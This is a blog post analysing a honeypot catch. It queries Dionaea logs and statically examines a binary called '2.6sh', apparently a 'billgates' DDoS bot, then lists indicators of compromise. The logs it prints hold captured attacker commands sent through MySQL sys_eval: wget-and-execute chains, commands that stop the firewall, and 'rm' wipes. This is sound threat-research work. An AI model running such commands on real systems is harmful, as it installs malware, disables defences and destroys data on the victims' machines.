Spare time with "2.6sh"

"I'm live!" I decided to publish a small post out of spare time, related to gathering indicators of compromises based on collected data from my honeypot. I was going to do a small project with my Raspberry Pi but it seems to have been misplaced... but i'll save that tidbit for later.

Today I will do a quick pass over on a binary called "2.6sh," but before I can do that one question should be asked, "How did you come across this sample?" Glad you asked...let's get started.

How did you come across this sample?

Currently, I run a honeypot called Dionaea, which is located on a machine out in the deep dark internet. Dionaea's main purpose is to expose emulated vulnerable services to attackers in hopes to obtain original malicious malware copies which maybe exploiting other systems in the wild. Some of the services emulated by Dionaea are MSSQL, MySQL, SIP, SSH, SMB, FTP, HTTP and so on. This is not the only tool I use for monitoring malicious acts. Another service which simply monitors the network is called Bro NSM or simply called "Bro." This is an extremely awesome framework that gives you in-depth analysis into your network traffic. If you have not heard of or given Bro a chance, I highly recommend you try it out. Now that I have gotten that out of the way, you are probably saying could you please get on with the finding and analysis :).

The Finding

Looking at logs, I had notice there were some MYSQL connection to the honeypot, so of course I pulled Bro and Dionaea logs. Given the large amount of noise seen on the internet for MySQL I knew I had to quickly narrow down the fun artifacts, so I decided to pull the Dionaea logs first. This will not only give brute forcing logs (username,password combos) but MySQL commands with arguments and a time frame of execution of those events. One artifact that stuck out on the initial gleaning of the logs was a attempted file download name "2.6sh" from a remote IP address.

Pulling from the mysql_command_args table in Dionaea's SQLite database, for a "2.6sh" search reveals the following:

Search for "2.6sh"

sqlite> .schema mysql_command_args  
    CREATE TABLE mysql_command_args (
                mysql_command_arg INTEGER PRIMARY KEY,
                mysql_command INTEGER,
                mysql_command_arg_index NUMBER NOT NULL,
                mysql_command_arg_data TEXT NOT NULL
                -- CONSTRAINT mysql_commands_connection_fkey FOREIGN KEY (connection) REFERENCES connections (connection)

sqlite> select * from mysql_command_args where     mysql_command_arg_data like '%2.6sh%';  
25804|43428|0|select sys_eval("wgethttp://;chmod 0755 2.6sh;./2.6sh;")  
25805|43429|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
25806|43430|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  
25826|43451|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
25827|43452|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
25828|43453|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  
26320|44439|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
26321|44440|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
26322|44441|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  

With this newly discovered information, we can now dive a bit deeper in our data set to see what else has been captured in Dionaea. Lets start by looking for that IP address in the connections and mysql_command_args table.

Malicious IP Connections

sqlite> .schema connections  
    CREATE TABLE connections    (
                connection INTEGER PRIMARY KEY,
                connection_type TEXT,
                connection_transport TEXT,
                connection_protocol TEXT,
                connection_timestamp INTEGER,
                connection_root INTEGER,
                connection_parent INTEGER,
                local_host TEXT,
                local_port INTEGER,
                remote_host TEXT,
                remote_hostname TEXT,
                remote_port INTEGER

sqlite> select * from connections where remote_host = '';  

Looking at the output from the connections table, we can narrow it down to timeframes related to these events. From the timeframe, we can then pull Bro logs to determine if there were any other related traffic besides MySQL. I created a quick python script to speed up analysis.

Timeframe from Connections

#!/usr/bin/env python
import argparse  
import time

parser = argparse.ArgumentParser(description='Converts Epoch Time to localtime')

parser.add_argument('epochtime', type=float, nargs='+', help='Example: 1444237762.53936')  
args = parser.parse_args()

for epoch in args.epochtime:  
    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(epoch))))
python 1442151157.86037 1442151159.6204 1442781286.83636 1442781417.54318 1442791680.71157 1442791688.01481 1444237762.53936 1444237769.40262  
2015-09-13 06:32:37  
2015-09-13 06:32:39  
2015-09-20 13:34:46  
2015-09-20 13:36:57  
2015-09-20 16:28:00  
2015-09-20 16:28:08  
2015-10-07 10:09:22  
2015-10-07 10:09:29  


sqlite> select * from mysql_command_args where mysql_command_arg_data like '%';  
25061|42230|0|select sys_eval("wget;chmod 777 lymm;./lymm;chmod +i lymm;")  
25062|42231|0|select sys_eval("wget;chmod 777 lymm;./lymm;")  
25410|42897|0|select sys_eval("wget;chmod 777 lymm;./lymm;chmod +i lymm;")  
25411|42898|0|select sys_eval("wget;chmod 777 lymm;./lymm;")  
25412|42899|0|system wget  
25415|42902|0|select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c;chmod 777 lymm;./lymm;")  
25416|42903|0|select sys_eval("wget -O /tmp/lymm;chmod 0755 /lymm;nohup /tmp/lymm > /dev/null 2>&1 &;")  
25417|42904|0|select sys_eval("rm *;curl -o /tmp/rotini;wget -c;chmod 777 /tmp/./lymm;/tmp/./lymm;rm /tmp/*;")  
25537|43124|0|system wget  
25576|43165|0|system wget  
25615|43206|0|system wget  
25804|43428|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
25826|43451|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
26320|44439|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  

After getting a view of what the honeypot caught, I decided to go forth and pull down the "2.6sh" artifact to do some reverse engineering (RE) of the executable.

File Information

$ file 2.6sh
2.6sh: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped  

Of course now "2.6sh" might make sense, seeing that this binary is an ELF, it might also be targeting systems with 2.6.x kernels. Not only may it be attacking that particular kernel but it attempts to trick the user into believing it was a BASH shell script being downloaded and executed. This of course is all speculation until you actually do some static analysis.

Static to IOCs

Loading this binary into IDA PRO you almost immediately notice the binary was not packed and has function names intact. Looking at the strings view, you notice several artifacts which indicate a DDoS style bot.

.rodata:080F18FC 0000000E C 11CAttackBase
.rodata:080F190A 00000010 C 13CPacketAttack
.rodata:080F1928 0000000D C 10CAttackUdp
.rodata:080F1944 0000000D C 10CAttackSyn
.rodata:080F1960 0000000E C 11CAttackIcmp
.rodata:080F197C 0000000D C 10CAttackDns
.rodata:080F1998 0000000D C 10CAttackAmp
.rodata:080F19B4 0000000D C 10CAttackPrx
.rodata:080F19D0 00000012 C 15CAttackCompress
.rodata:080F19F0 0000000D C 10CTcpAttack
.rodata:080F1A0C 0000000B C 9CAttackCc
.rodata:080F1A24 0000000B C 9CAttackIe
.rodata:080F1D0C 00000009 C 7CSerial

Along with the attack commands, you can also glean several IP addresses, update commands, user-agent strings, and possible file names. Typically I would continue to dive deeper and do some RE, but I want to gather quick indicators of compromise (IOCs) before diving into anything that might peak my interest. This will help with some pre-research, so that time is not spent looking into something that might have already been discovered. Continuing through the string view, I researched some artifacts and found that this binary is assoicated to a botnet called "billgates". More information can be found @ and the original source

Conclusion and IOCs

Given there is enough data out there related to this particular botnet (not this particular variant) there is no need for me to RE the binary any further. With that said enjoy the list of IOCs for further research.






"Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17"
"Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0"
"Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|"

IP addresses  

3rd Party lookups based on initial network connection

Only results that were found was the IP address of the initial event, but it did not contain the above IOCs. No results were found on VXshare. Although this binary hasn't been "found" as of yet, this does not mean there is not a variant that already exist and has been reported.